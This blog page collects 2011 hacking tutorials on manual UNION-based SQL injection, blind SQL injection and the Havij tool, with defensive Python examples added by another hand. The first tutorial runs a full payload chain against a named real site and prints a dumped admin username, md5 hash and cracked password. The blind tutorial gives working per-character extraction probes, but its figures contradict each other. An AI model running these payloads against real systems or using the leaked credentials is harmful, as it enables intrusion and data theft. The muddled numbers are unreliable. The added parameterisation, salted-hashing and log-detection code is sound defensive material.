Monday, October 24, 2011

SQL Injection Manually (Full Tutorial with images)

Hello, today I will show you how easy SQLi can be :)

Introduction:


What Is SQLi? (SQL injection)
SQL injection is a basic of web hacking, and it is the usual first step into exploiting sites.


How To Find SQLi-Vulnerable Sites, and Inject Them:

This is very simple: just use the dorks with a SQLi scanner, or Google, then check every site yourself.



Now, to check manually whether a site is SQLi vulnerable, just add ' at the end of the URL:

For example, we have our target:

http://www.cocobod.gh/news_details.php?id=30

Now we want to check if it is SQLi vulnerable, so we add ' at the end:
http://www.cocobod.gh/news_details.php?id=30'

If we get an error, that means it is vulnerable :)

So, now we move to the next step.
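Added example (my code, not code from the post or from the target site): the defender's view of the same ' check. It builds the query the vulnerable way and the parameterised way against an in-memory SQLite table standing in for the site's MySQL news table (assumptions: a constructed 7-column table with one row, id 30, and function names of my choosing), so you can see why a bare quote produces a database error in one and an ordinary "not found" in the other.

```python
import sqlite3

# Constructed stand-in for the site's news table (assumption: 7 columns, the
# count the tutorial arrives at; SQLite in memory instead of MySQL).
SCHEMA = """
CREATE TABLE news (
    id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT,
    published TEXT, category TEXT, views INTEGER
);
INSERT INTO news VALUES (30, 'Sample headline', 'Sample body', 'editor',
                         '2011-10-24', 'general', 0);
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fetch_news_vulnerable(conn, raw_id):
    """Builds the statement by string concatenation, the pattern behind the
    tutorial's target: everything after ?id= is parsed by the engine as SQL,
    so a stray quote or an appended clause changes the statement itself."""
    sql = "SELECT * FROM news WHERE id = " + raw_id
    try:
        return {"rows": conn.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        # This leaked error text is exactly the signal the ' and 'order by N'
        # probes in the tutorial look for.
        return {"rows": [], "error": str(exc)}


def fetch_news_safe(conn, raw_id):
    """Validates the type first, then binds the value as a parameter. The SQL
    text is constant, so the engine never sees user input as syntax, and a
    malformed id yields an ordinary empty result instead of a database error."""
    try:
        news_id = int(raw_id)
    except ValueError:
        return {"rows": [], "error": None}
    rows = conn.execute("SELECT * FROM news WHERE id = ?", (news_id,)).fetchall()
    return {"rows": rows, "error": None}


def probe_results(raw_id):
    """Runs one ?id= value through both implementations on a fresh database."""
    conn = open_db()
    try:
        return fetch_news_vulnerable(conn, raw_id), fetch_news_safe(conn, raw_id)
    finally:
        conn.close()


if __name__ == "__main__":
    for probe in ("30", "30'", "30 order by 7--", "30 order by 8--"):
        vuln, safe = probe_results(probe)
        print(f"{probe!r:20} vulnerable    -> rows={len(vuln['rows'])} error={vuln['error']!r}")
        print(f"{'':20} parameterised -> rows={len(safe['rows'])} error={safe['error']!r}")
```

The vulnerable builder leaks a database error for any malformed id, which is the signal every later step of this tutorial relies on; the parameterised one returns the same empty result for all of them, so that signal is gone. One caveat: ORDER BY positions and column names cannot be bound as parameters, so sorting driven by user input needs an allow-list of permitted columns rather than concatenation.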

How To Find the Column Count:

After you have your vulnerable site, you need to know its column count. To do it, just add "order by X--" at the end of the URL,
where X is a number from 1 upwards :D.

For example, we have our target server and we try to count columns:
we add order by 1-- at the end, then order by 2-- etc., always increasing the number until you get an error in your website like this one:

[Image: 1301868114-2.JPG]

So, on our target server, we have tried this:

http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column


That means that the 5th column does not exist, so the column count is 7 :D


How to Find the Accessible Columns:


Now we know that the column count is 4; the next step is to check for accessible columns. To do that, we use the query "UNION SELECT number,of,columns--" like this:

http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--

That means that we can get information out of the site through the 6th, the 2nd and the 3rd columns :D, haha, we got the usable columns :D.


How To Get the MySQL DB Version:

We need to know the MySQL DB version to know whether we can exploit this site or not, because every site that is using MySQL 4.x.x you can't work on, but every 5.x.x or above is exploitable :).
So to learn the MySQL DB version, just replace the number of the used column with "@@version".

For example:

http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--

[Image: 1301869123-4.JPG]

That means that we can continue working on this site.


How To Find the Database Name:


Now we are going to inject the site to learn the DB name.
To do this, replace the used column number with "group_concat(schema_name)", and add "from information_schema.schemata--" after the last column number, for example:

http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--

[Image: 1301869671-5.JPG]


Now, to get the one the website uses, replace "group_concat(schema_name)" with "concat(database())", for example:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--

[Image: 1301869885-6.JPG]

Congrats, you got the used DB :D.


How to Get the Table Names:


Now we need to get the table names. To do this, replace the used column number with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()--" after the last column number.

http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--

[Image: 1301870439-7.JPG]

How To Get Column Names:


To get column names, we will use these queries:
group_concat(column_name)
from information_schema.columns where table_schema=database()--

Example:

http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--

[Image: 1301870776-8.JPG]

How To Get Information From Columns:


Now we are at our final step: we will get the admin info from the columns. How to do it?
Simple, follow this example:

http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columnusername,0x3a,columnpassword),7 from currentdb.tableused--

So our exploit will be like this:

http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from cocobod_gh.coc_admin--

[Image: 1301871581-9.JPG]

Now we need to recover the password, which is stored as an md5 hash:
go to http://www.md5decrypter.co.uk/, paste your hash, fill in the captcha and click on decrypt; with a little luck, you will get the password like here :)

[Image: 1301871757-10.JPG]

comaster:2c39e3769d300f7e23f8a9e1e21773e7
comaster:cocoadmin4682

username : comaster
password : cocoadmin4682

We have successfully injected a website and got the admin info.
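Added example (my code, not the post's) for that last step: a lookup service works on these hashes because md5 of a given password is always the same 32 hex characters, so whoever hashed a wordlist beforehand just looks the digest up. The block builds a tiny constructed lookup table to show that, then stores a password the way the site should have: with a random salt and PBKDF2-HMAC-SHA256 from the standard library, where the same password gets a different stored value every time and no precomputed table applies. The wordlist, iteration count and all values are constructed; the hash from the screenshot above is not used.

```python
import hashlib
import hmac
import os

# Constructed toy wordlist (not the page's data); a lookup service is the same
# idea with billions of precomputed entries.
WORDLIST = ["password", "admin123", "letmein", "welcome1"]
ITERATIONS = 200_000   # PBKDF2 work factor (assumption; tune to ~100 ms per hash)


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def md5_lookup_table(words):
    """Precomputes md5(word) -> word. Unsalted md5 maps a password to one fixed
    digest, so this table is built once and reused against every site."""
    return {md5_hex(w): w for w in words}


def lookup_md5(digest_hex, table):
    """'Decrypting' md5 is a dictionary lookup, nothing more."""
    return table.get(digest_hex.lower())


def hash_password(password, salt=None):
    """Salted, slow hash (PBKDF2-HMAC-SHA256). Stored form: '<salt hex>$<hash hex>'."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + dk.hex()


def verify_password(password, stored):
    """Recomputes with the stored salt and compares in constant time."""
    salt_hex, dk_hex = stored.split("$", 1)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    table = md5_lookup_table(WORDLIST)
    digest = md5_hex("admin123")
    print("md5", digest, "->", lookup_md5(digest, table))
    s1, s2 = hash_password("admin123"), hash_password("admin123")
    print("same password, two different stored values:", s1 != s2)
    print("verify right / wrong:", verify_password("admin123", s1),
          verify_password("admin124", s1))
```

With a per-user random salt the precomputed table is useless, and the iteration count makes every guess cost real CPU time, so a dumped column of hashes no longer turns into passwords with "a little luck"; the site in this tutorial stored unsalted md5, which is why the lookup worked.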






Wednesday, October 19, 2011

Blind SQL Injection (Full Tutorial)

Hey guys, in this tut I will tell you how to hack a website with Blind SQL Injection.
I mostly use ordinary SQL Injection myself, but sometimes the "union" command doesn't work or we don't get a version name;
that's why Blind SQL Injection is important too. :)
OK, let's start.
First find your victim site. Blind SQL Injection often works on pages vulnerable to ordinary SQL Injection too.

Well, our victim in this tutorial is: http://www.blind-sql-injection-tut.com/index.php?id=7

Testing if our victim is vulnerable:

Now we have to test if our victim is vulnerable to Blind SQL Injection.
Add this:
and 1=0
Example URL: http://www.blind-sql-injection-tut.com/index.php?id=7 and 1 = 0
Now we should get an error.

Now add:
and 1 = 1
Example URL: http://www.blind-sql-injection-tut.com/index.php?id=7 and 1 = 1

Now we will see the website without an error message.
That means that our victim is vulnerable.

Find out the MySQL version

Now you have to add:
and SUBSTRING(version(),1,1)=5
If you see the website without an error, the version is 5.
If you get an error, try 4 or 3.

Let's do the injection

The way to do the injection is a bit different from the ordinary way. We don't search for tables etc., we only try to get
the password. First we try to get the first letter of the password. You will need this ASCII table.
Use this:
and ascii(substring((SELECT password from users limit 0,1),1,1))>70
We get an error: the ASCII value is too high, so let's try some lower value.
Try:
and ascii(substring((SELECT password from users limit 0,1),1,1))>64
Now we don't get an error; that means that the ASCII value is higher than 64.
Let's try 86:
and ascii(substring((SELECT password from users limit 0,1),1,1))>66

Now we get an error. That means our ASCII value is too high. But we know that we didn't get an error at 85; that means our ASCII value is 65.
Now check 85 in the ASCII table. 65 means "A", so the first letter of our password is "A".

Now we have to get the second letter.
and ascii(substring((SELECT password from users limit 0,1),2,1))>80
Result: error (too high)
and ascii(substring((SELECT password from users limit 0,1),2,1))>75
Result: no error (too low)
and ascii(substring((SELECT password from users limit 0,1),2,1))>76
Result: error
Now we know that the second letter of the password is ASCII 75. Open your ASCII table and check which letter that is:
75 = K
Now we know the first two letters of the password: AK

Well, I think you now know how it works; to get the next letters you only have to change 2,1 into 3,1.

Example:
first letter: "and ascii(substring((SELECT password from users limit 0,1),1,1))>70"
second letter: "and ascii(substring((SELECT password from users limit 0,1),2,1))>70"
third letter: "and ascii(substring((SELECT password from users limit 0,1),3,1))>70"
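Added example (my code, not from either post): detection logic for the request patterns described in this post and in the UNION-based one above, run over a constructed access-log sample in common log format. Client 10.0.0.5 replays the order by / union select / information_schema chain, 10.0.0.9 the and 1=0 / and 1=1 pair followed by the ascii(substring(...))>N probes, and 10.0.0.77 is an ordinary visitor. The regexes, client addresses, paths, status codes and thresholds are my assumptions; the one thing both techniques share, and that the detector keys on besides the literal payload shapes, is a single request replayed with only one number changed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log sample (common log format, no real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [24/Oct/2011:10:01:02 +0000] "GET /news_details.php?id=30 HTTP/1.1" 200 5120
10.0.0.5 - - [24/Oct/2011:10:01:09 +0000] "GET /news_details.php?id=30' HTTP/1.1" 500 312
10.0.0.5 - - [24/Oct/2011:10:01:15 +0000] "GET /news_details.php?id=30%20order%20by%201-- HTTP/1.1" 200 5120
10.0.0.5 - - [24/Oct/2011:10:01:18 +0000] "GET /news_details.php?id=30%20order%20by%202-- HTTP/1.1" 200 5120
10.0.0.5 - - [24/Oct/2011:10:01:21 +0000] "GET /news_details.php?id=30%20order%20by%208-- HTTP/1.1" 500 312
10.0.0.5 - - [24/Oct/2011:10:02:03 +0000] "GET /news_details.php?id=30%20union%20select%201,2,3,4,5,@@version,7-- HTTP/1.1" 200 5200
10.0.0.5 - - [24/Oct/2011:10:02:40 +0000] "GET /news_details.php?id=30%20union%20select%201,2,3,4,5,group_concat(table_name),7%20from%20information_schema.tables%20where%20table_schema=database()-- HTTP/1.1" 200 5400
10.0.0.9 - - [24/Oct/2011:11:00:00 +0000] "GET /index.php?id=7%20and%201=0 HTTP/1.1" 500 312
10.0.0.9 - - [24/Oct/2011:11:00:04 +0000] "GET /index.php?id=7%20and%201=1 HTTP/1.1" 200 4100
10.0.0.9 - - [24/Oct/2011:11:00:10 +0000] "GET /index.php?id=7%20and%20ascii(substring((SELECT%20password%20from%20users%20limit%200,1),1,1))%3E70 HTTP/1.1" 500 312
10.0.0.9 - - [24/Oct/2011:11:00:14 +0000] "GET /index.php?id=7%20and%20ascii(substring((SELECT%20password%20from%20users%20limit%200,1),1,1))%3E64 HTTP/1.1" 200 4100
10.0.0.9 - - [24/Oct/2011:11:00:18 +0000] "GET /index.php?id=7%20and%20ascii(substring((SELECT%20password%20from%20users%20limit%200,1),1,1))%3E66 HTTP/1.1" 500 312
10.0.0.77 - - [24/Oct/2011:11:30:00 +0000] "GET /index.php?id=8 HTTP/1.1" 200 4100
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Signatures applied to the URL-decoded, lower-cased query string; each one is a
# transcription of a payload shape shown in the two posts above.
SIGNATURES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),               # column counting
    "union_select":   re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),  # column access
    "version_probe":  re.compile(r"@@version|\bversion\s*\("),         # @@version / version()
    "schema_read":    re.compile(r"\binformation_schema\b"),           # db/table/column names
    "boolean_probe":  re.compile(r"\b(?:and|or)\s+1\s*=\s*[01]\b"),    # 'and 1=0' / 'and 1=1'
    "blind_compare":  re.compile(r"\bascii\s*\(\s*substring\s*\("),    # per-character inference
}

# Replaces the one number an attacker varies between otherwise identical requests
# (the N in 'order by N' or the threshold in '...)>N') so such replays group together.
SWEEP_RE = re.compile(r"(order\s+by\s+|[<>]=?\s*)\d+")


def parse_line(line):
    """Parses one common-log-format line; returns None for lines that don't match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["query"] = unquote_plus(urlsplit(rec["path"]).query).lower()
    return rec


def classify(query):
    """Returns the set of signature names matching a decoded query string."""
    hits = {name for name, rx in SIGNATURES.items() if rx.search(query)}
    if query.count("'") % 2 == 1:        # the bare ' probe: an unbalanced quote
        hits.add("unbalanced_quote")
    return hits


def analyse(log_text, sweep_threshold=3):
    """Per client: signatures seen, 5xx responses to flagged requests, and whether
    one flagged request was replayed with only a number changed >= threshold times."""
    clients = defaultdict(lambda: {"signatures": set(), "errors": 0,
                                   "requests": 0, "sweeps": defaultdict(int)})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        c = clients[rec["ip"]]
        c["requests"] += 1
        hits = classify(rec["query"])
        if not hits:
            continue
        c["signatures"] |= hits
        if rec["status"] >= 500:
            c["errors"] += 1
        c["sweeps"][SWEEP_RE.sub(lambda m: m.group(1) + "N", rec["query"])] += 1

    report = {}
    for ip, c in clients.items():
        sig = c["signatures"]
        if sig & {"union_select", "schema_read", "version_probe", "order_by_probe"}:
            verdict = "union-based enumeration"
        elif sig & {"boolean_probe", "blind_compare"}:
            verdict = "boolean-blind inference"
        elif sig:
            verdict = "injection probe"
        else:
            verdict = "benign"
        report[ip] = {"verdict": verdict, "signatures": sig, "errors": c["errors"],
                      "requests": c["requests"],
                      "sweep": any(n >= sweep_threshold for n in c["sweeps"].values())}
    return report


if __name__ == "__main__":
    for ip, r in analyse(SAMPLE_LOG).items():
        print(f"{ip:10} {r['verdict']:26} requests={r['requests']} errors={r['errors']} "
              f"sweep={r['sweep']} {sorted(r['signatures'])}")
```

The per-character inference in this post produces dozens of requests that differ only in the threshold after >, and the column-count step of the first post produces the same shape with order by N; grouping by a normalised query catches both even when the individual keywords are disguised, and the 5xx counter is worth alerting on by itself, since an endpoint that binds its id parameter should not produce database errors from it at all.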

Wednesday, October 5, 2011

SQL Injection through Havij (Full Tutorial)

Firstly, I am going to introduce the term Havij :)
Havij is an automated SQL Injection tool that helps penetration testers find and exploit SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. By using this software a user can perform back-end database fingerprinting, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements and even access the underlying file system and execute commands on the operating system.
The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injecting vulnerable targets using Havij.
The user-friendly GUI (Graphical User Interface) of Havij and its automated settings and detections make it easy to use for everyone, even amateur users.


Download havij 1.10

First find a SQLi-vulnerable site. Here I found a vulnerable site.

Now let's start.

Open Havij and copy and paste the vulnerable link as shown in the figure.
Now click on "Analyze".
Then it shows some messages there. Watch them and be patient for some time while it finds whether the site is vulnerable and the type of injection; if the DB server is MySQL it will find the database name. Then you get the database name, something like xxxx_xxxx.

Then move to another operation to find tables by clicking "Tables" as shown in the figure. Now click "Get tables", then wait some time if needed.

After the tables are found, you can see there will be "users". Put a mark on it and click on the "Get columns" tab as shown in the figure.
In that, just mark username and password and click "Get data".

Bingo! Now we got the id and pass, which may be the admin's...
The pass will come as md5; you can crack it also using this tool as shown in the figure...